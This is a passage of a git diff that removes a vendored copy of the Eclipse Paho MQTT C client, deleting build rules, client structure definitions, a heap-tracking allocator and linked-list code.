-    TARGET_LINK_LIBRARIES(paho-mqtt3as ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} ${LIBS_SYSTEM})
-    SET_TARGET_PROPERTIES(
-        paho-mqtt3cs paho-mqtt3as PROPERTIES
-        VERSION ${CLIENT_VERSION}
-        SOVERSION ${PAHO_VERSION_MAJOR}
-        COMPILE_DEFINITIONS "OPENSSL=1")
-    INSTALL(TARGETS paho-mqtt3cs paho-mqtt3as
-        ARCHIVE DESTINATION  ${CMAKE_INSTALL_LIBDIR}
-        LIBRARY DESTINATION  ${CMAKE_INSTALL_LIBDIR}
-        RUNTIME DESTINATION  ${CMAKE_INSTALL_BINDIR})
-
-    IF (PAHO_BUILD_STATIC)
-        ADD_LIBRARY(paho-mqtt3cs-static STATIC $<TARGET_OBJECTS:common_ssl_obj> MQTTClient.c SSLSocket.c)
-        ADD_LIBRARY(paho-mqtt3as-static STATIC $<TARGET_OBJECTS:common_ssl_obj> MQTTAsync.c SSLSocket.c)
-
-        TARGET_LINK_LIBRARIES(paho-mqtt3cs-static ${OPENSSL_LIBRARIES} ${LIBS_SYSTEM})
-        TARGET_LINK_LIBRARIES(paho-mqtt3as-static ${OPENSSL_LIBRARIES} ${LIBS_SYSTEM})
-        SET_TARGET_PROPERTIES(
-        paho-mqtt3cs-static paho-mqtt3as-static PROPERTIES
-        VERSION ${CLIENT_VERSION}
-        SOVERSION ${PAHO_VERSION_MAJOR}
-        COMPILE_DEFINITIONS "OPENSSL=1")
-
-        INSTALL(TARGETS paho-mqtt3cs-static paho-mqtt3as-static
-            ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR})
-    ENDIF()
-ENDIF()
diff --git a/thirdparty/paho.mqtt.c/src/Clients.c b/thirdparty/paho.mqtt.c/src/Clients.c
deleted file mode 100644
index 477d248..0000000
--- a/thirdparty/paho.mqtt.c/src/Clients.c
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - add SSL support
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions which apply to client structures
- * */
-
-
-#include "Clients.h"
-
-#include <string.h>
-#include <stdio.h>
-
-
-/**
- * List callback function for comparing clients by clientid
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int clientIDCompare(void* a, void* b)
-{
-	Clients* client = (Clients*)a;
-	/*printf("comparing clientdIDs %s with %s\n", client->clientID, (char*)b);*/
-	return strcmp(client->clientID, (char*)b) == 0;
-}
-
-
-/**
- * List callback function for comparing clients by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int clientSocketCompare(void* a, void* b)
-{
-	Clients* client = (Clients*)a;
-	/*printf("comparing %d with %d\n", (char*)a, (char*)b); */
-	return client->net.socket == *(int*)b;
-}
diff --git a/thirdparty/paho.mqtt.c/src/Clients.h b/thirdparty/paho.mqtt.c/src/Clients.h
deleted file mode 100644
index 02ed23a..0000000
--- a/thirdparty/paho.mqtt.c/src/Clients.h
+++ /dev/null
@@ -1,209 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - add SSL support
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - change will payload to binary
- *    Ian Craggs - password to binary
- *******************************************************************************/
-
-#if !defined(CLIENTS_H)
-#define CLIENTS_H
-
-#include <time.h>
-#if defined(OPENSSL)
-#if defined(WIN32) || defined(WIN64)
-#include <winsock2.h>
-#endif
-#include <openssl/ssl.h>
-#endif
-#include "MQTTClient.h"
-#include "LinkedList.h"
-#include "MQTTClientPersistence.h"
-/*BE
-include "LinkedList"
-BE*/
-
-/*BE
-def PUBLICATIONS
-{
-   n32 ptr STRING open "topic"
-   n32 ptr DATA "payload"
-   n32 dec "payloadlen"
-   n32 dec "refcount"
-}
-BE*/
-/**
- * Stored publication data to minimize copying
- */
-typedef struct
-{
-	char *topic;
-	int topiclen;
-	char* payload;
-	int payloadlen;
-	int refcount;
-} Publications;
-
-/*BE
-// This should get moved to MQTTProtocol, but the includes don't quite work yet
-map MESSAGE_TYPES
-{
-   "PUBREC" 5
-   "PUBREL" .
-   "PUBCOMP" .
-}
-
-
-def MESSAGES
-{
-   n32 dec "qos"
-   n32 map bool "retain"
-   n32 dec "msgid"
-   n32 ptr PUBLICATIONS "publish"
-   n32 time "lastTouch"
-   n8 map MESSAGE_TYPES "nextMessageType"
-   n32 dec "len"
-}
-defList(MESSAGES)
-BE*/
-/**
- * Client publication message data
- */
-typedef struct
-{
-	int qos;
-	int retain;
-	int msgid;
-	Publications *publish;
-	time_t lastTouch;		/**> used for retry and expiry */
-	char nextMessageType;	/**> PUBREC, PUBREL, PUBCOMP */
-	int len;				/**> length of the whole structure+data */
-} Messages;
-
-
-/*BE
-def WILLMESSAGES
-{
-   n32 ptr STRING open "topic"
-   n32 ptr DATA open "msg"
-   n32 dec "retained"
-   n32 dec "qos"
-}
-BE*/
-
-/**
- * Client will message data
- */
-typedef struct
-{
-	char *topic;
-	int payloadlen;
-	void *payload;
-	int retained;
-	int qos;
-} willMessages;
-
-/*BE
-map CLIENT_BITS
-{
-	"cleansession" 1 : .
-	"connected" 2 : .
-	"good" 4 : .
-	"ping_outstanding" 8 : .
-}
-def CLIENTS
-{
-	n32 ptr STRING open "clientID"
-	n32 ptr STRING open "username"
-	n32 ptr STRING open "password"
-	n32 map CLIENT_BITS "bits"
-	at 4 n8 bits 7:6 dec "connect_state"
-	at 8
-	n32 dec "socket"
-	n32 ptr "SSL"
-	n32 dec "msgID"
-	n32 dec "keepAliveInterval"
-	n32 dec "maxInflightMessages"
-	n32 ptr BRIDGECONNECTIONS "bridge_context"
-	n32 time "lastContact"
-	n32 ptr WILLMESSAGES "will"
-	n32 ptr MESSAGESList open "inboundMsgs"
-	n32 ptr MESSAGESList open "outboundMsgs"
-	n32 ptr MESSAGESList open "messageQueue"
-	n32 dec "discardedMsgs"
-}
-
-defList(CLIENTS)
-
-BE*/
-
-typedef struct
-{
-	int socket;
-	time_t lastSent;
-	time_t lastReceived;
-#if defined(OPENSSL)
-	SSL* ssl;
-	SSL_CTX* ctx;
-#endif
-} networkHandles;
-
-/**
- * Data related to one client
- */
-typedef struct
-{
-	char* clientID;					      /**< the string id of the client */
-	const char* username;					/**< MQTT v3.1 user name */
-	int passwordlen;              /**< MQTT password length */
-	const void* password;					/**< MQTT v3.1 binary password */
-	unsigned int cleansession : 1;	/**< MQTT clean session flag */
-	unsigned int connected : 1;		/**< whether it is currently connected */
-	unsigned int good : 1; 			  /**< if we have an error on the socket we turn this off */
-	unsigned int ping_outstanding : 1;
-	int connect_state : 4;
-	networkHandles net;
-	int msgID;
-	int keepAliveInterval;
-	int retryInterval;
-	int maxInflightMessages;
-	willMessages* will;
-	List* inboundMsgs;
-	List* outboundMsgs;				/**< in flight */
-	List* messageQueue;
-	unsigned int qentry_seqno;
-	void* phandle;  /* the persistence handle */
-	MQTTClient_persistence* persistence; /* a persistence implementation */
-	void* context; /* calling context - used when calling disconnect_internal */
-	int MQTTVersion;
-#if defined(OPENSSL)
-	MQTTClient_SSLOptions *sslopts;
-	SSL_SESSION* session;    /***< SSL session pointer for fast handhake */
-#endif
-} Clients;
-
-int clientIDCompare(void* a, void* b);
-int clientSocketCompare(void* a, void* b);
-
-/**
- * Configuration data related to all clients
- */
-typedef struct
-{
-	const char* version;
-	List* clients;
-} ClientStates;
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Heap.c b/thirdparty/paho.mqtt.c/src/Heap.c
deleted file mode 100644
index bef4c70..0000000
--- a/thirdparty/paho.mqtt.c/src/Heap.c
+++ /dev/null
@@ -1,481 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - use tree data structure instead of list
- *    Ian Craggs - change roundup to Heap_roundup to avoid macro name clash on MacOSX
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions to manage the heap with the goal of eliminating memory leaks
- *
- * For any module to use these functions transparently, simply include the Heap.h
- * header file.  Malloc and free will be redefined, but will behave in exactly the same
- * way as normal, so no recoding is necessary.
- *
- * */
-
-#include "Tree.h"
-#include "Log.h"
-#include "StackTrace.h"
-#include "Thread.h"
-
-#if defined(HEAP_UNIT_TESTS)
-char* Broker_recordFFDC(char* symptoms);
-#endif /* HEAP_UNIT_TESTS */
-
-#include <stdlib.h>
-#include <string.h>
-#include <stdio.h>
-#include <stddef.h>
-
-#include "Heap.h"
-
-#undef malloc
-#undef realloc
-#undef free
-
-#if defined(WIN32) || defined(WIN64)
-mutex_type heap_mutex;
-#else
-static pthread_mutex_t heap_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type heap_mutex = &heap_mutex_store;
-#endif
-
-static heap_info state = {0, 0}; /**< global heap state information */
-static int eyecatcher = 0x88888888;
-
-/**
- * Each item on the heap is recorded with this structure.
- */
-typedef struct
-{
-	char* file;		/**< the name of the source file where the storage was allocated */
-	int line;		/**< the line no in the source file where it was allocated */
-	void* ptr;		/**< pointer to the allocated storage */
-	size_t size;    /**< size of the allocated storage */
-} storageElement;
-
-static Tree heap;	/**< Tree that holds the allocation records */
-static const char *errmsg = "Memory allocation error";
-
-
-static size_t Heap_roundup(size_t size);
-static int ptrCompare(void* a, void* b, int value);
-/*static void Heap_check(char* string, void* ptr);*/
-static void checkEyecatchers(char* file, int line, void* p, size_t size);
-static int Internal_heap_unlink(char* file, int line, void* p);
-static void HeapScan(enum LOG_LEVELS log_level);
-
-
-/**
- * Round allocation size up to a multiple of the size of an int.  Apart from possibly reducing fragmentation,
- * on the old v3 gcc compilers I was hitting some weird behaviour, which might have been errors in
- * sizeof() used on structures and related to packing.  In any case, this fixes that too.
- * @param size the size actually needed
- * @return the rounded up size
- */
-static size_t Heap_roundup(size_t size)
-{
-	static int multsize = 4*sizeof(int);
-
-	if (size % multsize != 0)
-		size += multsize - (size % multsize);
-	return size;
-}
-
-
-/**
- * List callback function for comparing storage elements
- * @param a pointer to the current content in the tree (storageElement*)
- * @param b pointer to the memory to free
- * @return boolean indicating whether a and b are equal
- */
-static int ptrCompare(void* a, void* b, int value)
-{
-	a = ((storageElement*)a)->ptr;
-	if (value)
-		b = ((storageElement*)b)->ptr;
-
-	return (a > b) ? -1 : (a == b) ? 0 : 1;
-}
-
-/*
-static void Heap_check(char* string, void* ptr)
-{
-	Node* curnode = NULL;
-	storageElement* prev, *s = NULL;
-
-	printf("Heap_check start %p\n", ptr);
-	while ((curnode = TreeNextElement(&heap, curnode)) != NULL)
-	{
-		prev = s;
-		s = (storageElement*)(curnode->content);
-
-		if (prev)
-		{
-		if (ptrCompare(s, prev, 1) != -1)
-		{
-			printf("%s: heap order error %d %p %p\n", string, ptrCompare(s, prev, 1), prev->ptr, s->ptr);
-			exit(99);
-		}
-		else
-			printf("%s: heap order good %d %p %p\n", string, ptrCompare(s, prev, 1), prev->ptr, s->ptr);
-		}
-	}
-}*/
-
-
-/**
- * Allocates a block of memory.  A direct replacement for malloc, but keeps track of items
- * allocated in a list, so that free can check that a item is being freed correctly and that
- * we can check that all memory is freed at shutdown.
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param size the size of the item to be allocated
- * @return pointer to the allocated item, or NULL if there was an error
- */
-void* mymalloc(char* file, int line, size_t size)
-{
-	storageElement* s = NULL;
-	size_t space = sizeof(storageElement);
-	size_t filenamelen = strlen(file)+1;
-
-	Thread_lock_mutex(heap_mutex);
-	size = Heap_roundup(size);
-	if ((s = malloc(sizeof(storageElement))) == NULL)
-	{
-		Log(LOG_ERROR, 13, errmsg);
-		return NULL;
-	}
-	s->size = size; /* size without eyecatchers */
-	if ((s->file = malloc(filenamelen)) == NULL)
-	{
-		Log(LOG_ERROR, 13, errmsg);
-		free(s);
-		return NULL;
-	}
-	space += filenamelen;
-	strcpy(s->file, file);
-	s->line = line;
-	/* Add space for eyecatcher at each end */
-	if ((s->ptr = malloc(size + 2*sizeof(int))) == NULL)
-	{
-		Log(LOG_ERROR, 13, errmsg);
-		free(s->file);
-		free(s);
-		return NULL;
-	}
-	space += size + 2*sizeof(int);
-	*(int*)(s->ptr) = eyecatcher; /* start eyecatcher */
-	*(int*)(((char*)(s->ptr)) + (sizeof(int) + size)) = eyecatcher; /* end eyecatcher */
-	Log(TRACE_MAX, -1, "Allocating %d bytes in heap at file %s line %d ptr %p\n", size, file, line, s->ptr);
-	TreeAdd(&heap, s, space);
-	state.current_size += size;
-	if (state.current_size > state.max_size)
-		state.max_size = state.current_size;
-	Thread_unlock_mutex(heap_mutex);
-	return ((int*)(s->ptr)) + 1;	/* skip start eyecatcher */
-}
-
-
-static void checkEyecatchers(char* file, int line, void* p, size_t size)
-{
-	int *sp = (int*)p;
-	char *cp = (char*)p;
-	int us;
-	static const char *msg = "Invalid %s eyecatcher %d in heap item at file %s line %d";
-
-	if ((us = *--sp) != eyecatcher)
-		Log(LOG_ERROR, 13, msg, "start", us, file, line);
-
-	cp += size;
-	if ((us = *(int*)cp) != eyecatcher)
-		Log(LOG_ERROR, 13, msg, "end", us, file, line);
-}
-
-
-/**
- * Remove an item from the recorded heap without actually freeing it.
- * Use sparingly!
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param p pointer to the item to be removed
- */
-static int Internal_heap_unlink(char* file, int line, void* p)
-{
-	Node* e = NULL;
-	int rc = 0;
-
-	e = TreeFind(&heap, ((int*)p)-1);
-	if (e == NULL)
-		Log(LOG_ERROR, 13, "Failed to remove heap item at file %s line %d", file, line);
-	else
-	{
-		storageElement* s = (storageElement*)(e->content);
-		Log(TRACE_MAX, -1, "Freeing %d bytes in heap at file %s line %d, heap use now %d bytes\n",
-											 s->size, file, line, state.current_size);
-		checkEyecatchers(file, line, p, s->size);
-		/* free(s->ptr); */
-		free(s->file);
-		state.current_size -= s->size;
-		TreeRemoveNodeIndex(&heap, e, 0);
-		free(s);
-		rc = 1;
-	}
-	return rc;
-}
-
-
-/**
- * Frees a block of memory.  A direct replacement for free, but checks that a item is in
- * the allocates list first.
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param p pointer to the item to be freed
- */
-void myfree(char* file, int line, void* p)
-{
-	Thread_lock_mutex(heap_mutex);
-	if (Internal_heap_unlink(file, line, p))
-		free(((int*)p)-1);
-	Thread_unlock_mutex(heap_mutex);
-}
-
-
-/**
- * Remove an item from the recorded heap without actually freeing it.
- * Use sparingly!
- * @param file use the __FILE__ macro to indicate which file this item was allocated in
- * @param line use the __LINE__ macro to indicate which line this item was allocated at
- * @param p pointer to the item to be removed
- */
-void Heap_unlink(char* file, int line, void* p)
-{
-	Thread_lock_mutex(heap_mutex);
-	Internal_heap_unlink(file, line, p);
-	Thread_unlock_mutex(heap_mutex);
-}
-
-
-/**
- * Reallocates a block of memory.  A direct replacement for realloc, but keeps track of items
- * allocated in a list, so that free can check that a item is being freed correctly and that
- * we can check that all memory is freed at shutdown.
- * We have to remove the item from the tree, as the memory is in order and so it needs to
- * be reinserted in the correct place.
- * @param file use the __FILE__ macro to indicate which file this item was reallocated in
- * @param line use the __LINE__ macro to indicate which line this item was reallocated at
- * @param p pointer to the item to be reallocated
- * @param size the new size of the item
- * @return pointer to the allocated item, or NULL if there was an error
- */
-void *myrealloc(char* file, int line, void* p, size_t size)
-{
-	void* rc = NULL;
-	storageElement* s = NULL;
-
-	Thread_lock_mutex(heap_mutex);
-	s = TreeRemoveKey(&heap, ((int*)p)-1);
-	if (s == NULL)
-		Log(LOG_ERROR, 13, "Failed to reallocate heap item at file %s line %d", file, line);
-	else
-	{
-		size_t space = sizeof(storageElement);
-		size_t filenamelen = strlen(file)+1;
-
-		checkEyecatchers(file, line, p, s->size);
-		size = Heap_roundup(size);
-		state.current_size += size - s->size;
-		if (state.current_size > state.max_size)
-			state.max_size = state.current_size;
-		if ((s->ptr = realloc(s->ptr, size + 2*sizeof(int))) == NULL)
-		{
-			Log(LOG_ERROR, 13, errmsg);
-			return NULL;
-		}
-		space += size + 2*sizeof(int) - s->size;
-		*(int*)(s->ptr) = eyecatcher; /* start eyecatcher */
-		*(int*)(((char*)(s->ptr)) + (sizeof(int) + size)) = eyecatcher; /* end eyecatcher */
-		s->size = size;
-		space -= strlen(s->file);
-		s->file = realloc(s->file, filenamelen);
-		space += filenamelen;
-		strcpy(s->file, file);
-		s->line = line;
-		rc = s->ptr;
-		TreeAdd(&heap, s, space);
-	}
-	Thread_unlock_mutex(heap_mutex);
-	return (rc == NULL) ? NULL : ((int*)(rc)) + 1;	/* skip start eyecatcher */
-}
-
-
-/**
- * Utility to find an item in the heap.  Lets you know if the heap already contains
- * the memory location in question.
- * @param p pointer to a memory location
- * @return pointer to the storage element if found, or NULL
- */
-void* Heap_findItem(void* p)
-{
-	Node* e = NULL;
-
-	Thread_lock_mutex(heap_mutex);
-	e = TreeFind(&heap, ((int*)p)-1);
-	Thread_unlock_mutex(heap_mutex);
-	return (e == NULL) ? NULL : e->content;
-}
-
-
-/**
- * Scans the heap and reports any items currently allocated.
- * To be used at shutdown if any heap items have not been freed.
- */
-static void HeapScan(enum LOG_LEVELS log_level)
-{
-	Node* current = NULL;
-
-	Thread_lock_mutex(heap_mutex);
-	Log(log_level, -1, "Heap scan start, total %d bytes", state.current_size);
-	while ((current = TreeNextElement(&heap, current)) != NULL)
-	{
-		storageElement* s = (storageElement*)(current->content);
-		Log(log_level, -1, "Heap element size %d, line %d, file %s, ptr %p", s->size, s->line, s->file, s->ptr);
-		Log(log_level, -1, "  Content %*.s", (10 > current->size) ? s->size : 10, (char*)(((int*)s->ptr) + 1));
-	}
-	Log(log_level, -1, "Heap scan end");
-	Thread_unlock_mutex(heap_mutex);
-}
-
-
-/**
- * Heap initialization.
- */
-int Heap_initialize(void)
-{
-	TreeInitializeNoMalloc(&heap, ptrCompare);
-	heap.heap_tracking = 0; /* no recursive heap tracking! */
-	return 0;
-}
-
-
-/**
- * Heap termination.
- */
-void Heap_terminate(void)
-{
-	Log(TRACE_MIN, -1, "Maximum heap use was %d bytes", state.max_size);
-	if (state.current_size > 20) /* One log list is freed after this function is called */
-	{
-		Log(LOG_ERROR, -1, "Some memory not freed at shutdown, possible memory leak");
-		HeapScan(LOG_ERROR);
-	}
-}
-
-
-/**
- * Access to heap state
- * @return pointer to the heap state structure
- */
-heap_info* Heap_get_info(void)
-{
-	return &state;
-}
-
-
-/**
- * Dump a string from the heap so that it can be displayed conveniently
- * @param file file handle to dump the heap contents to
- * @param str the string to dump, could be NULL
- */
-int HeapDumpString(FILE* file, char* str)
-{
-	int rc = 0;
-	size_t len = str ? strlen(str) + 1 : 0; /* include the trailing null */
-
-	if (fwrite(&(str), sizeof(char*), 1, file) != 1)
-		rc = -1;
-	else if (fwrite(&(len), sizeof(int), 1 ,file) != 1)
-		rc = -1;
-	else if (len > 0 && fwrite(str, len, 1, file) != 1)
-		rc = -1;
-	return rc;
-}
-
-
-/**
- * Dump the state of the heap
- * @param file file handle to dump the heap contents to
- */
-int HeapDump(FILE* file)
-{
-	int rc = 0;
-	Node* current = NULL;
-
-	while (rc == 0 && (current = TreeNextElement(&heap, current)))
-	{
-		storageElement* s = (storageElement*)(current->content);
-
-		if (fwrite(&(s->ptr), sizeof(s->ptr), 1, file) != 1)
-			rc = -1;
-		else if (fwrite(&(current->size), sizeof(current->size), 1, file) != 1)
-			rc = -1;
-		else if (fwrite(s->ptr, current->size, 1, file) != 1)
-			rc = -1;
-	}
-	return rc;
-}
-
-
-#if defined(HEAP_UNIT_TESTS)
-
-void Log(enum LOG_LEVELS log_level, int msgno, char* format, ...)
-{
-	printf("Log %s", format);
-}
-
-char* Broker_recordFFDC(char* symptoms)
-{
-	printf("recordFFDC");
-	return "";
-}
-
-#define malloc(x) mymalloc(__FILE__, __LINE__, x)
-#define realloc(a, b) myrealloc(__FILE__, __LINE__, a, b)
-#define free(x) myfree(__FILE__, __LINE__, x)
-
-int main(int argc, char *argv[])
-{
-	char* h = NULL;
-	Heap_initialize();
-
-	h = malloc(12);
-	free(h);
-	printf("freed h\n");
-
-	h = malloc(12);
-	h = realloc(h, 14);
-	h = realloc(h, 25);
-	h = realloc(h, 255);
-	h = realloc(h, 2225);
-	h = realloc(h, 22225);
-    printf("freeing h\n");
-	free(h);
-	Heap_terminate();
-	printf("Finishing\n");
-	return 0;
-}
-
-#endif /* HEAP_UNIT_TESTS */
diff --git a/thirdparty/paho.mqtt.c/src/Heap.h b/thirdparty/paho.mqtt.c/src/Heap.h
deleted file mode 100644
index 165b89f..0000000
--- a/thirdparty/paho.mqtt.c/src/Heap.h
+++ /dev/null
@@ -1,76 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - use tree data structure instead of list
- *******************************************************************************/
-
-
-#if !defined(HEAP_H)
-#define HEAP_H
-
-#if defined(HIGH_PERFORMANCE)
-#define NO_HEAP_TRACKING 1
-#endif
-
-#include <stdio.h>
-#include <stdlib.h>
-
-#if !defined(NO_HEAP_TRACKING)
-/**
- * redefines malloc to use "mymalloc" so that heap allocation can be tracked
- * @param x the size of the item to be allocated
- * @return the pointer to the item allocated, or NULL
- */
-#define malloc(x) mymalloc(__FILE__, __LINE__, x)
-
-/**
- * redefines realloc to use "myrealloc" so that heap allocation can be tracked
- * @param a the heap item to be reallocated
- * @param b the new size of the item
- * @return the new pointer to the heap item
- */
-#define realloc(a, b) myrealloc(__FILE__, __LINE__, a, b)
-
-/**
- * redefines free to use "myfree" so that heap allocation can be tracked
- * @param x the size of the item to be freed
- */
-#define free(x) myfree(__FILE__, __LINE__, x)
-
-#endif
-
-/**
- * Information about the state of the heap.
- */
-typedef struct
-{
-	size_t current_size;	/**< current size of the heap in bytes */
-	size_t max_size;		/**< max size the heap has reached in bytes */
-} heap_info;
-
-
-void* mymalloc(char*, int, size_t size);
-void* myrealloc(char*, int, void* p, size_t size);
-void myfree(char*, int, void* p);
-
-void Heap_scan(FILE* file);
-int Heap_initialize(void);
-void Heap_terminate(void);
-heap_info* Heap_get_info(void);
-int HeapDump(FILE* file);
-int HeapDumpString(FILE* file, char* str);
-void* Heap_findItem(void* p);
-void Heap_unlink(char* file, int line, void* p);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/LinkedList.c b/thirdparty/paho.mqtt.c/src/LinkedList.c
deleted file mode 100644
index a8d073e..0000000
--- a/thirdparty/paho.mqtt.c/src/LinkedList.c
+++ /dev/null
@@ -1,500 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions which apply to linked list structures.
- *
- * These linked lists can hold data of any sort, pointed to by the content pointer of the
- * ListElement structure.  ListElements hold the points to the next and previous items in the
- * list.
- * */
-
-#include "LinkedList.h"
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "Heap.h"
-
-
-static int ListUnlink(List* aList, void* content, int(*callback)(void*, void*), int freeContent);
-
-
-/**
- * Sets a list structure to empty - all null values.  Does not remove any items from the list.
- * @param newl a pointer to the list structure to be initialized
- */
-void ListZero(List* newl)
-{
-	memset(newl, '\0', sizeof(List));
-	/*newl->first = NULL;
-	newl->last = NULL;
-	newl->current = NULL;
-	newl->count = newl->size = 0;*/
-}
-
-
-/**
- * Allocates and initializes a new list structure.
- * @return a pointer to the new list structure
- */
-List* ListInitialize(void)
-{
-	List* newl = malloc(sizeof(List));
-	ListZero(newl);
-	return newl;
-}
-
-
-/**
- * Append an already allocated ListElement and content to a list.  Can be used to move
- * an item from one list to another.
- * @param aList the list to which the item is to be added
- * @param content the list item content itself
- * @param newel the ListElement to be used in adding the new item
- * @param size the size of the element
- */
-void ListAppendNoMalloc(List* aList, void* content, ListElement* newel, size_t size)
-{ /* for heap use */
-	newel->content = content;
-	newel->next = NULL;
-	newel->prev = aList->last;
-	if (aList->first == NULL)
-		aList->first = newel;
-	else
-		aList->last->next = newel;
-	aList->last = newel;
-	++(aList->count);
-	aList->size += size;
-}
-
-
-/**
- * Append an item to a list.
- * @param aList the list to which the item is to be added
- * @param content the list item content itself
- * @param size the size of the element
- */
-void ListAppend(List* aList, void* content, size_t size)
-{
-	ListElement* newel = malloc(sizeof(ListElement));
-	ListAppendNoMalloc(aList, content, newel, size);
-}
-
-
-/**
- * Insert an item to a list at a specific position.
- * @param aList the list to which the item is to be added
- * @param content the list item content itself
- * @param size the size of the element
- * @param index the position in the list. If NULL, this function is equivalent
- * to ListAppend.
- */
-void ListInsert(List* aList, void* content, size_t size, ListElement* index)
-{
-	ListElement* newel = malloc(sizeof(ListElement));
-
-	if ( index == NULL )
-		ListAppendNoMalloc(aList, content, newel, size);
-	else
-	{
-		newel->content = content;
-		newel->next = index;
-		newel->prev = index->prev;
-
-		index->prev = newel;
-		if ( newel->prev != NULL )
-			newel->prev->next = newel;
-		else
-			aList->first = newel;
-
-		++(aList->count);
-		aList->size += size;
-	}
-}
-
-
-/**
- * Finds an element in a list by comparing the content pointers, rather than the contents
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the list item content itself
- * @return the list item found, or NULL
- */
-ListElement* ListFind(List* aList, void* content)
-{
-	return ListFindItem(aList, content, NULL);
-}
-
-
-/**
- * Finds an element in a list by comparing the content or pointer to the content.  A callback
- * function is used to define the method of comparison for each element.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element (NULL means compare by content pointer)
- * @return the list element found, or NULL
- */
-ListElement* ListFindItem(List* aList, void* content, int(*callback)(void*, void*))
-{
-	ListElement* rc = NULL;
-
-	if (aList->current != NULL && ((callback == NULL && aList->current->content == content) ||
-		   (callback != NULL && callback(aList->current->content, content))))
-		rc = aList->current;
-	else
-	{
-		ListElement* current = NULL;
-
-		/* find the content */
-		while (ListNextElement(aList, &current) != NULL)
-		{
-			if (callback == NULL)
-			{
-				if (current->content == content)
-				{
-					rc = current;
-					break;
-				}
-			}
-			else
-			{
-				if (callback(current->content, content))
-				{
-					rc = current;
-					break;
-				}
-			}
-		}
-		if (rc != NULL)
-			aList->current = rc;
-	}
-	return rc;
-}
-
-
-/**
- * Removes and optionally frees an element in a list by comparing the content.
- * A callback function is used to define the method of comparison for each element.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
- * @param callback pointer to a function which compares each element
- * @param freeContent boolean value to indicate whether the item found is to be freed
- * @return 1=item removed, 0=item not removed
- */
-static int ListUnlink(List* aList, void* content, int(*callback)(void*, void*), int freeContent)
-{
-	ListElement* next = NULL;
-	ListElement* saved = aList->current;
-	int saveddeleted = 0;
-
-	if (!ListFindItem(aList, content, callback))
-		return 0; /* false, did not remove item */
-
-	if (aList->current->prev == NULL)
-		/* so this is the first element, and we have to update the "first" pointer */
-		aList->first = aList->current->next;
-	else
-		aList->current->prev->next = aList->current->next;
-
-	if (aList->current->next == NULL)
-		aList->last = aList->current->prev;
-	else
-		aList->current->next->prev = aList->current->prev;
-
-	next = aList->current->next;
-	if (freeContent)
-		free(aList->current->content);
-	if (saved == aList->current)
-		saveddeleted = 1;
-	free(aList->current);
-	if (saveddeleted)
-		aList->current = next;
-	else
-		aList->current = saved;
-	--(aList->count);
-	return 1; /* successfully removed item */
-}
-
-
-/**
- * Removes but does not free an item in a list by comparing the pointer to the content.
- * @param aList the list in which the search is to be conducted
- * @param content pointer to the content to look for
